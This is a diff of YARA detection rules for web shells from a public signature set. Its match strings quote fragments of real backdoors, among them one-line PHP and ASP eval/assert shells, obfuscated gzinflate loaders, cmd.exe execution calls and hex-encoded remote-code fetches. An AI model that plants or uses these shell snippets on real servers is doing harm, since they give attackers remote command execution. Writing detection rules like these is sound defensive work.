+		$s16 = "<TITLE>Expdoor.com ASP" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_150
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php2
 {
 	meta:
-		description = "Web Shell - file 150.php"
+		description = "Web shells - generated from file php2.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1757-L1771"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3284-L3297"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "400c4b0bed5c90f048398e1d268ce4dc"
-		logic_hash = "139e3d6aa3cd2b6a9731a6cc14c921f9fd82ff7ca79d156f1ff6bc544897fb12"
+		hash = "fbf2e76e6f897f6f42b896c855069276"
+		logic_hash = "0350df076a25af77fbd8d5db2b38438a10cd5b9237b23b2f64c6360607b41982"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "HJ3HjqxclkZfp"
-		$s1 = "<? eval(gzinflate(base64_decode('" fullword
+		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp_2
+rule SIGNATURE_BASE_Webshell_Bypass_Iisuser_P
 {
 	meta:
-		description = "Web Shell - file cmdjsp.jsp"
+		description = "Web shells - generated from file bypass-iisuser-p.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1772-L1786"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3298-L3311"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
-		logic_hash = "83be82e260adcff9d3d11344c363f6b5da331339ffe78e561cea9ab09b209030"
+		hash = "924d294400a64fa888a79316fb3ccd90"
+		logic_hash = "60d0609291e5def26ce949c903ac767db4157b4f9cf4eee315c69ee7a8d8e77b"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
-		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_C37
+rule SIGNATURE_BASE_Webshell_Sig_404Super
 {
 	meta:
-		description = "Web Shell - file c37.php"
+		description = "Web shells - generated from file 404super.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1787-L1801"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3312-L3330"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
-		logic_hash = "b93394f4e05cc96c31a8adcb0981aa8b069780893c469b41ece3d3ce92c42251"
+		hash = "7ed63176226f83d36dce47ce82507b28"
+		logic_hash = "01ecffc6bca2acf1ea4f4d965f3513f7b08ee3d5abbda29d53081f2931ecf9e9"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
-		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
+		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
+		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
+		$s7 = "//http://require.duapp.com/session.php" fullword
+		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
+		$s12 = "//define('pass','123456');" fullword
+		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_B37
+rule SIGNATURE_BASE_Webshell_Webshells_New_JSP
 {
 	meta:
-		description = "Web Shell - file b37.php"
+		description = "Web shells - generated from file JSP.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1802-L1815"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3331-L3346"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0421445303cfd0ec6bc20b3846e30ff0"
-		logic_hash = "ae0cca5723a1e885c26ece5082c24f4c95f0262b8e7baf6db5efde5cfee2cc42"
+		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
+		logic_hash = "bcb2f5d16ff3cc1454bf4653defe037e02a9228a5b7cf7428b1a577f4207c3c8"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
+		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
+		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
+		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Backdoor
+rule SIGNATURE_BASE_Webshell_Webshell_123
 {
 	meta:
-		description = "Web Shell - file php-backdoor.php"
+		description = "Web shells - generated from file webshell-123.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-03-29"
+		date = "2014-03-28"
+		modified = "2023-01-27"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1816-L1830"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3347-L3364"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
-		logic_hash = "1f754b4d29eb93316183cf904b375ded7ccdae1d2196fe05950c449ed0d690f4"
+		hash = "2782bb170acaed3829ea9a04f0ac7218"
+		logic_hash = "1caccadf2bd7d265f9b5026c82acc31ade95313d57382651004db8b5e361312d"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
-		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+		$s0 = "// Web Shell!!" fullword
+		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
+		$s3 = "$default_charset = \"UTF-8\";" fullword
+		$s4 = "// url:http://www.weigongkai.com/shell/"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Dabao
+rule SIGNATURE_BASE_Webshell_Dev_Core
 {
 	meta:
-		description = "Web Shell - file dabao.asp"
+		description = "Web shells - generated from file dev_core.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1831-L1845"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3365-L3383"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
-		logic_hash = "62cf46dc16a7365d196c2cb8ede8b1380a0877d134d3726d7c777096a4eda942"
+		hash = "55ad9309b006884f660c41e53150fc2e"
+		logic_hash = "b3c7a9bdaa7e5bf76df9ffba94157777c32199edeaa1c8745e9400d138abc267"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
-		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
+		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
+		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
+		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
+		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
+		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
+		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_2
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php
 {
 	meta:
-		description = "Web Shell - file 2.php"
+		description = "Web shells - generated from file pHp.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1846-L1859"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3384-L3401"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "267c37c3a285a84f541066fc5b3c1747"
-		logic_hash = "bd485c825ae7ac11ff67d109d3c07fb405272a5919e00af39788d1a9c94e754d"
+		hash = "b0e842bdf83396c3ef8c71ff94e64167"
+		logic_hash = "a943f3b0d1d56194e250c7cf3e05b2bfec7b29f91ef56085d645efa3fe8995c9"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
+		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
+		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
+		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
+		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
+		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Cmdasp
+rule SIGNATURE_BASE_Webshell_Webshells_New_Pppp
 {
 	meta:
-		description = "Web Shell - file cmdasp.asp"
+		description = "Web shells - generated from file pppp.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1860-L1874"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3402-L3417"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "57b51418a799d2d016be546f399c2e9b"
-		logic_hash = "4259419b4db8e6a83df6f7d258d41028f7f76b0fd2308eeadb4555066c5a2940"
+		hash = "cf01cb6e09ee594545693c5d327bdd50"
+		logic_hash = "bd09fc2ec88bea83b16e63afafa3d5f74f119a81046a663322f5b396b48da135"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$s0 = "Mail: chinese@hackermail.com" fullword
+		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
+		$s6 = "Site: http://blog.weili.me" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Spjspshell
+rule SIGNATURE_BASE_Webshell_Webshells_New_Code
 {
 	meta:
-		description = "Web Shell - file spjspshell.jsp"
+		description = "Web shells - generated from file code.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1875-L1888"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3418-L3435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d39d51154aaad4ba89947c459a729971"
-		logic_hash = "7926eadd3ffb21de73a63e7a28a525037bf88396ea369599b41ac8c0b0d112ad"
+		hash = "a444014c134ff24c0be5a05c02b81a79"
+		logic_hash = "5ae053a9afc1f720c56304c434cd89861e1df4060b7d813921e7f85978227020"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
+		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
+		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
+		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
+		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
+		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Action
+rule SIGNATURE_BASE_Webshell_Webshells_New_Jspyyy
 {
 	meta:
-		description = "Web Shell - file action.jsp"
+		description = "Web shells - generated from file jspyyy.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1889-L1903"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3436-L3449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
-		logic_hash = "5ea7d074d0fe98cf2514a65231013a374532d6b3aa2487bcc34d4285f558752a"
+		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
+		logic_hash = "0afe45556aa7b562672cc4b609cf001aaa617b03028322abac6524f666b069e1"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
-		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
+		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Inderxer
+rule SIGNATURE_BASE_Webshell_Webshells_New_Xxxx
 {
 	meta:
-		description = "Web Shell - file Inderxer.asp"
+		description = "Web shells - generated from file xxxx.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1904-L1917"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3450-L3463"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9ea82afb8c7070817d4cdf686abe0300"
-		logic_hash = "915f2f38c1ca1321980ac66ebb95b0c46443e0ba64cc4b2014200db43439c85e"
+		hash = "5bcba70b2137375225d8eedcde2c0ebb"
+		logic_hash = "e14cc1eaf357389ca58193c77ce2f54774aebb42be9df15f12415df356c7ed42"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+		$s0 = "<?php eval($_POST[1]);?>  " fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Rader
+rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp3
 {
 	meta:
-		description = "Web Shell - file Rader.asp"
+		description = "Web shells - generated from file JJjsp3.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1918-L1932"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3464-L3477"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ad1a362e0a24c4475335e3e891a01731"
-		logic_hash = "b578f3e844cbb361f455e55353fad2f0134ede7c3c468cebad9ae265e6e768b8"
+		hash = "949ffee1e07a1269df7c69b9722d293e"
+		logic_hash = "44889540effa2f71889e7f6d0c5d12486e256d83b9230c4902d56f6a59b7939b"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
-		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
+		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Madnet_Smowu
+rule SIGNATURE_BASE_Webshell_Webshells_New_PHP1
 {
 	meta:
-		description = "Web Shell - file smowu.php"
+		description = "Web shells - generated from file PHP1.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1933-L1951"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3478-L3493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3aaa8cad47055ba53190020311b0fb83"
-		logic_hash = "5c4f76bdbe535a899e40c890eb1ea65e070c781fe5dd44cf13d4832cfd6d2e13"
+		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
+		logic_hash = "1c5eb355455c7fbd2b74d91f78e1d77f460dfeb4fe0ee65f18aa1453337b67a0"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "//Authentication" fullword
-		$s1 = "$login = \"" fullword
-		$s2 = "eval(gzinflate(base64_decode('"
-		$s4 = "//Pass"
-		$s5 = "$md5_pass = \""
-		$s6 = "//If no pass then hash"
+		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
+		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
+		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Moon
+rule SIGNATURE_BASE_Webshell_Webshells_New_Jjjsp2
 {
 	meta:
-		description = "Web Shell - file moon.php"
+		description = "Web shells - generated from file JJJsp2.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1952-L1967"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3494-L3510"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
-		logic_hash = "4e26dbef647caee19a8707a067c228ba96bd986369e4c87c68964ae42c85b09a"
+		hash = "5a9fec45236768069c99f0bfd566d754"
+		logic_hash = "47dca67c7a01035996d032cb3871da5532aea81ab6570c93c4a6b148fd95e9f9"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo '<option value=\"create function backshell returns string soname"
-		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
-		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
+		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
+		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
+		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
+		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Minupload
+rule SIGNATURE_BASE_Webshell_Webshells_New_Radhat
 {
 	meta:
-		description = "Web Shell - file minupload.jsp"
+		description = "Web shells - generated from file radhat.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1969-L1983"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3511-L3524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ec905a1395d176c27f388d202375bdf9"
-		logic_hash = "53dea3ea0e2cf83907273fa7f64b21b40e9a5c8e4aa34e5d46d2762396fa89ce"
+		hash = "72cb5ef226834ed791144abaa0acdfd4"
+		logic_hash = "28d4d380b25da05a3be439bad72725fa49c947535dfeb5c24994a849c0592b81"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
-		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
+		$s1 = "sod=Array(\"D\",\"7\",\"S"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_ELMALISEKER_Backd00R
+rule SIGNATURE_BASE_Webshell_Webshells_New_Asp1
 {
 	meta:
-		description = "Web Shell - file ELMALISEKER Backd00r.asp"
+		description = "Web shells - generated from file asp1.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1984-L1998"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3525-L3539"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
-		logic_hash = "c5eea930dc386c60e60f052c4945c8d6c0125d3500e60794e21d5ea04f226628"
+		hash = "b63e708cd58ae1ec85cf784060b69cad"
+		logic_hash = "6c76c5388825e29d333096d4cfa3782b7776f31b206a0ed5a8809428d698778b"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
-		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
+		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
+		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Bug_1_
+rule SIGNATURE_BASE_Webshell_Webshells_New_Php6
 {
 	meta:
-		description = "Web Shell - file bug (1).php"
+		description = "Web shells - generated from file php6.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		date = "2014-03-28"
 		modified = "2025-03-29"
